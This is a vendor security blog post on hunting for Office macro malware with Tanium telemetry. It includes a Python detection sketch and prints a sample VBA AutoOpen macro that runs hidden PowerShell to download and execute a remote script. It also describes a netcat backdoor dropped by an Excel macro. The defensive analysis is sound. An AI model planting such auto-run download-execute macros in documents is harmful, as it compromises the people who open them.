What’s old is new: Detecting Office macro malware with Tanium

Years of InfoSec experience will tell you that security threats are cyclical. What is old will become new and what is new will eventually become old. We’ve seen proof of this from the re-emergence of devastating distributed denial of service attacks, massive malvertising campaigns, and more recently, macro-based malware attacks. For example, several of the more common ransomware variants such as Dridex, Locky[1], Cryptolocker, GozNym[2] and others utilize macros to initially compromise their victims’ computers. Even suspected nation state malware such as BlackEnergy[3] has utilized macros to deliver malicious payloads to victims. Just a month ago, Microsoft’s Office 365 Advanced Threat Protection team indicated that 98% of Office-targeted attacks contain macros.

Macros are an easy way to execute arbitrary Visual Basic for Applications (VBA) code hidden inside an Office document. Despite the proliferation of macro-based malware (and availability of Group Policy Object settings to limit their execution[4]), many organizations heavily utilize legitimate macro-containing documents and have hesitated to implement controls that may hinder their operation.

Before the recent buzz of ransomware attacks, macros were used in an even simpler, less technically sophisticated scheme called Business E-mail Compromise (BEC) to defraud small and medium-sized companies. During my time as a Supervisory Special Agent with the Major Cyber Crimes Unit at FBI’s Cyber Division, we released a report on BEC which concluded that from late 2013 to early 2016 more than 17,000 victims in all 50 states, and roughly 80 different countries, were victimized by suspected organized crime groups for a total of $2.3 billion in losses[5][6].

Regardless of the end goal of the attacker, macro-based malware most often utilizes one or more of the following techniques:

  1. Execute a native process or secondary interpreter, such as PowerShell, passing it parameters or additional script code to run
  2. Establish a remote connection to a malicious website to either download and execute remote code, or to post information supplied by a victim
  3. Embed the complete contents of a malicious file within the document to “drop” and execute it locally

This post will explore these techniques and various approaches to detecting and analyzing them using the Tanium platform.

Example #1 – Detecting macros that spawn PowerShell or other anomalous processes

The following example utilizes a macro in an Office document that launches a PowerShell command line. Arguments supplied to this instance of PowerShell allow it to retrieve and execute additional code from a remote URL:

Sub AutoOpen()
    ' Runs automatically when the document is opened. Launches a hidden PowerShell
    ' that fetches and runs a remote script, redirecting its output to a temp file.
    shellOut = Shell("powershell -nop -c " & Chr(34) & "iex(New-Object Net.WebClient).DownloadString('https://[URL_goes_here]/demo.ps1'); Infect-Host > C:\Windows\Temp\1.txt" & Chr(34) & "", vbHide)
End Sub

We’ll use a Tanium hunting dashboard that applies a methodology-based indicator to continuously monitor for anomalous execution of PowerShell across all endpoints. In this specific case, “anomalous” means “powershell.exe” launched as a sub-process of common Office applications, such as Excel or Word, that are common targets of macro malware. This dashboard utilizes the historical executed process data captured by Tanium Trace.

Figure 1 shows an excerpt of matching results, including the PowerShell command line, from an infected system named “WIN7-INTERACT”:


Figure 1 – Excerpt of hunting dashboard for PowerShell spawned by Office applications

Having detected this anomalous activity, we can utilize the Trace workbench to conduct deep-dive analysis on the impacted system. Figure 2 shows that Tanium recorded the full command line, process path, parent command line, and several other details for this anomalous instance of “powershell.exe”. Additionally, the “swim lane” visualization plots file, registry, network and child-process events attributed to this process.

As highlighted, note that the PowerShell command produced an output file named “C:\Windows\Temp\1.txt”. We could use Trace to retrieve this file from the system and further examine its contents.


Figure 2 – Trace drill-down view examining a malicious instance of PowerShell

We can also explore the Process Tree visualization to confirm the expected relationship that led us to this system in the first place: “powershell.exe” launched by “WINWORD.EXE”, as shown in Figure 3.


Figure 3 – Output from the Process Tree View


Other variants of macro malware follow a similar approach, but initially drop and execute VBS scripts (e.g. via the “cscript.exe” interpreter) rather than directly launching PowerShell as shown.

Example #2 – Detecting network activity generated by Office macros

The macro in this second example directly downloads and executes a malicious file from a remote web site. We used a benign file – a ZIP of the SysInternals “autoruns” utility – that the macro saved to a temporary directory and executed. As in the prior example, this sequence of events (irrespective of the malicious file that’s ultimately dropped and executed) creates anomalous network, process, and file system activity attributable to the Office application that opened the macro.

In this example, we’ll start with a broad ad-hoc Tanium search for historical network connections initiated to port 443 by Office applications. Figure 4 shows the initial results without any subsequent filtering. An analyst might exclude legitimate connections (such as to Microsoft’s update servers) by applying additional search filters by time range or destination IP to further home in on results of interest – depending on whether they were working from specific initial leads or “hunting” for outliers.


Figure 4 – Ad-hoc search results for connections to remote port 443 by Office applications

By pivoting to the Trace timeline view for one of the impacted instances of Excel.exe, we can examine each step of the macro’s interaction with the file system, spawned sub-processes, and registry changes (a selection of which are shown in Figures 5-7 below).


Figure 5 – Network connection to remote site, initiated upon macro execution


Figure 6 – Creation of “C:\Windows\temp\” (retrieved from remote site)


Figure 7 – Registry changes incurred upon execution of “C:\Windows\tmp\autorunsc.exe” (after being extracted and executed from the ZIP file)

Example #3 – Analyzing file system activity generated by a macro

This final example utilizes a Microsoft Excel file with a malicious macro and an embedded Object Linking and Embedding (OLE) object containing a Windows version of netcat. Upon execution, the macro: (1) drops netcat to a temporary directory on disk, (2) drops a malicious script, “config.vbs”, that runs the backdoor, and (3) sets an autostart registry key to automatically load the script. We’ve already covered detecting or searching for process and network events initiated by a malicious macro – so let’s focus on detecting the file system activity.

We’ve set up a Trace dashboard that monitors for Office applications creating, modifying, or renaming PowerShell, VBS, and other atypical file types within temporary directories (in this case, “%APPDATA%\Local\Temp”). Once again, this data originates from Tanium Trace, which continuously monitors file system operations and links them to the associated processes. Figure 8 shows the captured events after opening the malicious document during multiple test runs.


Figure 8 – Monitoring for file system activity generated by a malicious Excel macro
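As an added example (not Tanium’s code or the post’s own), the methodology behind Examples #1 through #3 is expressed below as three rules run over a constructed event stream: an Office parent spawning a script interpreter, an Office application connecting to port 443 outside an allowlist, and an Office application writing script or binary files into a temporary directory. The event field names, the allowlist and the sample events are assumptions built for this demonstration, not the schema of Tanium Trace.

```python
import ntpath

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
INTERPRETERS = {"powershell.exe", "cscript.exe", "wscript.exe", "cmd.exe", "mshta.exe"}
SCRIPT_EXTS = {".ps1", ".vbs", ".js", ".bat", ".exe", ".dll", ".hta"}
TEMP_DIRS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\")
ALLOWED_DST = {"203.0.113.10"}  # constructed allowlist: destinations an analyst has already vetted

def _name(path):
    return ntpath.basename(path).lower()  # r"C:\...\WINWORD.EXE" -> "winword.exe"

def check_process(ev):
    # Example #1: a script interpreter whose parent process is an Office application.
    if _name(ev["parent"]) in OFFICE_APPS and _name(ev["image"]) in INTERPRETERS:
        return f"{_name(ev['parent'])} spawned {_name(ev['image'])}: {ev['cmdline']}"

def check_network(ev):
    # Example #2: an Office application connecting to port 443 at a destination not on the allowlist.
    if _name(ev["image"]) in OFFICE_APPS and ev["dst_port"] == 443 and ev["dst_ip"] not in ALLOWED_DST:
        return f"{_name(ev['image'])} connected to {ev['dst_ip']}:443"

def check_file(ev):
    # Example #3: an Office application creating, modifying or renaming a script/binary in a temp directory.
    low = ev["path"].lower()
    if (_name(ev["image"]) in OFFICE_APPS and ev["op"] in {"create", "modify", "rename"}
            and any(d in low for d in TEMP_DIRS) and ntpath.splitext(low)[1] in SCRIPT_EXTS):
        return f"{_name(ev['image'])} wrote {ev['path']}"

CHECKS = {"process": check_process, "network": check_network, "file": check_file}

def hunt(events):
    """Return (host, event type, finding) for every event that matches a rule."""
    found = ((ev["host"], ev["type"], CHECKS[ev["type"]](ev)) for ev in events)
    return [hit for hit in found if hit[2]]

WORD, EXCEL = r"C:\Program Files\Microsoft Office\WINWORD.EXE", r"C:\Program Files\Microsoft Office\EXCEL.EXE"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed events shaped like the post's three examples; not real Trace output
    {"type": "process", "host": "WIN7-INTERACT", "parent": WORD, "image": PS,
     "cmdline": "powershell -nop -c \"iex(New-Object Net.WebClient).DownloadString('https://[URL_goes_here]/demo.ps1')\""},
    {"type": "process", "host": "WIN7-INTERACT", "parent": r"C:\Windows\explorer.exe", "image": WORD, "cmdline": "WINWORD.EXE"},
    {"type": "network", "host": "WIN7-INTERACT", "image": EXCEL, "dst_ip": "198.51.100.7", "dst_port": 443},
    {"type": "network", "host": "WIN7-INTERACT", "image": EXCEL, "dst_ip": "203.0.113.10", "dst_port": 443},
    {"type": "file", "host": "WIN7-INTERACT", "image": EXCEL, "op": "create", "path": r"C:\Users\u\AppData\Local\Temp\config.vbs"},
    {"type": "file", "host": "WIN7-INTERACT", "image": EXCEL, "op": "modify", "path": r"C:\Users\u\Documents\budget.xlsx"},
]

if __name__ == "__main__":
    print(*hunt(SAMPLE_EVENTS), sep="\n")
```

Only three of the six constructed events match: the benign WINWORD.EXE launch, the allowlisted connection and the spreadsheet saved to Documents are all ignored, which is the discrimination the dashboards described above rely on.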

A similar dashboard could apply Tanium Trace data to monitor for changes to registry auto-start locations by an Office macro. Analysts could also use an ad-hoc search, “Get AutoRuns from all machines”, via Tanium’s Incident Response content to find the outlier entry pointing to the malicious “config.vbs” script dropped by the macro.


Figure 9 – Ad-hoc query for autorun entry created by the malware

To summarize, malicious Office macros generate anomalous process, network, file system, and registry events that present many opportunities for post-infection detection and analysis – often without having to rely on overly specific indicators of compromise. Tanium’s Incident Response and Trace sensors can help analysts run ad-hoc searches to hunt across an environment for this activity, use dashboards for continuous detection and monitoring, and conduct deep-dive analysis of an impacted system.


[1] 2016. “Locky” crypto-ransomware rides in on malicious Word …

[2] Banking Trojans Nymaim, Gozi Merge to Steal $4M.

[3] 2016. APT Malware Analysis: BlackEnergy/Додаток1 Excel VBA …

[4] 2016. New feature in Office 2016 can block macros and help …

[5] 2015. FBI — Business E-Mail Compromise.

[6] 2016. FBI — FBI Warns of Rise in Schemes Targeting Businesses …
